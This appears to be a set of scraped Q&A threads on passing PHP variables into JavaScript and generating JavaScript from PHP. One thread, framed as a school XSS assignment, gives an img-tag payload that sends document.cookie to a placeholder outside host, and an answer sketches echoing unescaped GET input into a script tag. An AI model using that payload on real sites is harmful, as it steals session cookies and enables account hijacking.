I created now a Javascript Code that get the php variable into javascript code, my issue that the php variable is important and I don't want any can see this variable is there is any way to do that by the way I tried to use obfuscator but it doesn't work because of the PHP code inside the Javascript code, let's say this is my Code,
<?php
$var = "this is impotant";
?>
<script type="text/javascript">
var javaScriptVar = "<?php echo $var; ?>";
</script>
So, is there any way to use PHP variables in Javascript code or hide the result of the PHP code?
Nobody sees the PHP code. But if you expose values into Javascript, they are not secret anymore. There is no way to deal with this. You cannot use the value in Javascript and NOT reveal it.
If you want to keep process data secret on the server, and available for the next request of that user, use a session.
People will only see the value of the variable. They wont know what it is or how important it is supposed to be. Nobody will see the variable name because the PHP code is executed BEFORE the page is sent to the client. Therefore there is no need to obfuscate the value, and you cant anyway since you need the value.
An example. if I use this PHP code in my file
<p>Hello Mr <?php echo $MY_SUPER_SECRET_VARIABLE ?></p>
the only thing people will be able to see in the source when the page loads is
<p>Hello Mr Bond</p>
The same rule applies if it is placed in Javascript
First you need to understand that Javascript is executed on the client side, every piece of code and variable are in some way accessible by someone with some programming background.
Although you can obfuscate the source code and encrypt the variable to make it harder to read, there is no 100% protection when things happen on client side.
who wants to get the value, will get it. but you can
dynamically inject them via ajax
encode (base64 etc.) the value
obfuscate the code
PHP files will be interpreted into static (like html or xml format) file, means that all variables will be replaced with certain values.What users see is static, no php code displayed but just interpreted text.
Related
I would like to pass a variable as a value to a website. (Doing a school assignment on XSS)
For example I currently have:
$.cookie('echat') and $.cookie('PHPSESSID')
I would like to pass it into a link say:
xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')
However, nothing is pass to xxxx.com/xxx.php
Any1 know the syntax to do this?
specifically i am placing a img tag like this to exploit:
< img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie>
Apparently, document.cookie is not working and I need $.cookie('PHPSESSID') to get the PHPID
Your URL is setting the value of $_GET['cookie'] to $.cookie('PHPSESSID') in your PHP script, nothing more. How that's handled is up to PHP.
Since that looks like JavaScript (specifically, the jQuery Cookie plugin), you could conceivably do echo "<script>{$_GET['cookie']}</script>"; in your PHP to spit it out as JS on the resulting page. As you hopefully know from your classes, blindly using user-submitted data like this is dangerous and a bad idea.
use this php function
url_encode("string")
such as
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>
In php, if I put the following line
echo "<script type='text/javascript'>[javascript code here]</script>";
can I assume that the javascript code will be always be executed irrespective of where I put it in a php file? Assume that the php syntax is valid and the line gets executed (it is not barred by some conditions)
Edit: I have a php file where I have some javascript code and alert('ok'); but the messagebox never appears. I was wondering if the code actually got executed and the browser dismissed the messagebox as the page was changed.
No.
You might put it in a PHP file that doesn't output HTML (e.g. a PDF document or a zip file).
You might put it above a header() call and break the header
You might put it inside an if statement body so it would only be included conditionally
You might put it inside a <style> element, so it would be treated as invalid CSS
etc
PHP just outputs stuff. If you want it to output a <script> element, then you have to put it somewhere where it will be output and it somewhere where outputting it makes sense.
Yes it will be executed because it is returned to browser as html code and browser does not care where it comes from. It is also often abused in XSS attacks.
To conclude it will execute always until it is correct JS and it prints in proper place in html structure.
The code will be executed if the place in which it is inserted is valid. It will behave identically to if you had simply written the javascript code there.
For example, I'm sure the following code wouldn't work:
<ta<?php echo "<script type='text/javascript'>[javascript code here]</script>"; ?>ble>
You are messing with two pairs of shoes here. Your javascript code will not be executed anywhere on the server side (where PHP is executed). After the PHP prozessor is done and the output (including your line of javascript) is send to the client your javascript will be executed. Depending on how strict the clients browser is your <script>-element needs to be inside of the <head> or <body> Element of your HTML-page
I want to access PHP(server side file variables) with JavaScript(Client side script) without using MySQL. e.g. i have $name=Tom; How do i access this $name variable in JavaScript? Please show code example as i am new to programming. Thank you.
You could do something like
<script>
php_variable = <?= json_encode($php_variable) ?>;
</script>
which should even let you do arrays and possibly objects. It requires PHP 5.2 or later, though. If you're stuck without json_encode, you could wrap quotes around a call to addslashes, but that won't let you do arrays and such.
If your intent is to set the value within some form, you can do like
<input type="text" name="stuff" value="<?= htmlentities($stuff) ?>">
and of course, you could access that element's value within your script if necessary.
Two key points to take away here:
Since PHP is generating the page, it can output stuff as it pleases -- even right in the middle of a <script> element. You can use this to transfer variables from server to client, but not vice versa. (Transferring client variables...well...that's effectively going to require XHR or a form submit.)
But always* escape stuff going from PHP to anywhere -- particularly if it's going into HTML, JS, or directly into SQL. Unless you have your server set all retarded (enabling magic quotes, for example), PHP will get the data raw, and it could have special chars that will cause one or all of those to break.
* Ok, not quite always. If you have a PHP variable that contains some HTML or JS you want to output as HTML/JS, then don't escape it. But you should be aware of what "XSS" means, and don't blindly output data supplied by a user.
Since javascript is client side and php is server side, you would need to use ajax(javascript) to access server side session variables(php). I would recommend researching jquery's ajax framework.
you can do this simple things.
function reset1()
{
//document.frmadd.intFaqCategoryTypeID.value='1';
document.frmadd.reset();
document.frmadd.intChatRoomCategoryId.value='<?php echo $intChatRoomCategoryId ; ?>';
document.frmadd.intEventId.value='<?php echo $intEventId ; ?>';
document.frmadd.intGroupId.value='<?php echo $intGroupId ; ?>';
document.frmadd.intMemberID.value='<?php echo $intAddedByMemberId ; ?>';
return false;
}
How do i make PHP work with JS?
I mean more like, i want to check if the user is logged in or not,
and if he is then it will:
$("#message").fadeIn("slow"); ..
How should i do this?
I have an idea maybe have a file that checks it in php, and then it echo out 1 or 0.
And then a script that checks if its getting 1 then do the message fade in.. But im not as so experienced to script that in JS
You cannot directly pass variables from Javascript to PHP because the PHP run on the server before it's sent to the client. But you can 'pass' variables from PHP to Javascript.
For example:
echo('<script type="text/javascript'> var phpvar = '.$variablefromphp.';</script>');
However, you can manipulate what javascript your browser will print. You can first check if the user is logged in in PHP, and based on that, conditionally print the HTML and Javascript.
For example
if($user->logged_in())
{
echo('<script type="text/javascript">$("#message").fadeIn("slow");</script>');
}
else
{
//php function
generateLoginBox();
}
I only javascript to enhance user experience. You should make your application work even when javascript turned off.
With the javascript enabled, you can add an enhanced experience, such as animated page element, AJAX request, etc.
In case of login state, you should have a way to know it in PHP script. Then in the output, you can have a conditional block that only executed if the login state is true. You can put anything you want here.
Javascript can be working in a static HTML page. You can use this to create a simple test for the code that you wrote, to see if it working as you want. Read the documentation in http://www.jquery.com/, there are many links there to many examples.
I render a page using YUI. and depending on the user I need to change how it is rendered. This change is not something that can be parametrized, it is drastic and different for each user.
Please tell me how can I generate Javascript dynamically?
I personally use a PHP file to pass a JavaScript object made up of some basic session and internal settings, nothing mission-critical as passing information to the client isn't overly secure, but I believe it might follow the same principles as what you are looking for.
Similarly, I use this to display certain elements once the client is logged in, although all the authorization is still done on the server-side. If my session handler gives the PHP file the ok, it outputs a JavaScript object using a PHP heredoc string, otherwise, it doesn't output anything. You can use attributes of this object to compare against, or you could output only the JavaScript for how a certain page should be rendered, based on settings in your PHP file.
HTML:
<script src="common/javascript/php_feeder.php" type="text/javascript"></script>
PHP:
//my session handler authorisation check has been removed
//although you could place your own up here.
//assuming session was authorised
//set content type header
header("content-type: application/x-javascript");
$js_object = <<<EOT
var my_object = {
my_attr: '{$my_attr}',
my_attr2: '{$my_arrt2}',
etc: '{$etc}'
}
EOT;
print($js_object);
You can probably create two separate Java script files, and include the required file, depending upon the user type.
Pseudocode
If user_type is One
<Script src='one.js' type='javascript'></script>
else
<Script src='other.js' type='javascript'></script>
End If
JavaScript has an eval function, so I think (I haven't tried it) that you can generate JavaScript by writing it into a string variable (and then calling eval on that string variable).
A little bit of elaboration here would most certainly help in getting you a more descript and helpful answer. That in mind, though, you could easily just use functions declared inside an if statement to provide distinctly varied experiences for different users.
A very basic example:
<script>
function do_something(userType)
{
if (userType == 'A')
{
// everything you need to do for userType A
}
if (userType == 'B')
{
// everything you need to do for userType B
}
}
</script>